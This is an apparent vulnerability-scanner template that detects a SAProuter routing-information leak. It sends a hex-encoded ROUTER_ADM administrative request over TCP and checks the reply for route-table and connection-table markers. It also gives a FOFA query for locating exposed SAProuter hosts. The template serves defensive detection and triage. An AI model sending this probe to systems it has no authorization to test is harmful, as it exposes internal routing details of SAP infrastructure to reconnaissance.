漏洞描述
SAPRouter contains an information leakage vulnerability.
fofa: protocol="sap-router"
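# Detection template: checks whether a SAProuter instance answers a remote
# administrative information request and returns its routing details.
# The nesting below is restored from the flattened listing; read flat, the
# `request` and `expression` keys would collide as duplicates.
#
# Triage: a match means the reply contained all three markers tested in the
# rule expressions (route table, working directory, connection table), so
# internal routing data is readable by whoever can reach the port. Limit
# network access to the SAProuter port to trusted peers and follow the vendor
# guidance in the second reference.
id: sap-router-info-leak

info:
  name: SAPRouter - Routing information leak
  author: randomstr1ng
  # NOTE(review): rating kept as published. This is an information disclosure,
  # so confirm the severity against your own risk model before it drives
  # alert priority.
  severity: critical
  description: |
    SAPRouter contains an information leakage vulnerability.
    fofa: protocol="sap-router"
  reference:
    - https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner
    - https://support.sap.com/en/tools/connectivity-tools/saprouter.html
  tags: network,sap
  created: 2022/03/21

# Variables derived from the scan target. `hostname` is used as given by r0;
# `host` gets an explicit port appended by r1, so it is presumably the bare
# host name without a port (confirm against the engine's documentation).
set:
  hostname: request.url.host
  host: request.url.domain

rules:
  # r0: send the probe to the target address exactly as supplied.
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      # Hex-encoded request; it carries the ASCII marker "ROUTER_ADM"
      # (52 4f 55 54 45 52 5f 41 44 4d). Defenders can look for that marker
      # arriving from unexpected sources to spot this probe in captures.
      data: "00000022524f555445525f41444d002802000000000000000000000000000000000000000000"
      data-type: hex
      # Upper bound on how much of the reply is read (presumably bytes).
      read-size: 2048
    # All three strings must be present, which keeps a banner-only or partial
    # reply from counting as a finding.
    expression: response.raw.bcontains(b'Routtab') && response.raw.bcontains(b'Working directory') && response.raw.bcontains(b'SAProuter Connection Table')
  # r1: same probe and same match, but forced to port 3299 (the usual
  # SAProuter port) for targets given without one.
  r1:
    request:
      type: tcp
      host: "{{host}}:3299"
      data: "00000022524f555445525f41444d002802000000000000000000000000000000000000000000"
      data-type: hex
      read-size: 2048
    expression: response.raw.bcontains(b'Routtab') && response.raw.bcontains(b'Working directory') && response.raw.bcontains(b'SAProuter Connection Table')

# Report a finding when either rule matches.
expression: r0() || r1()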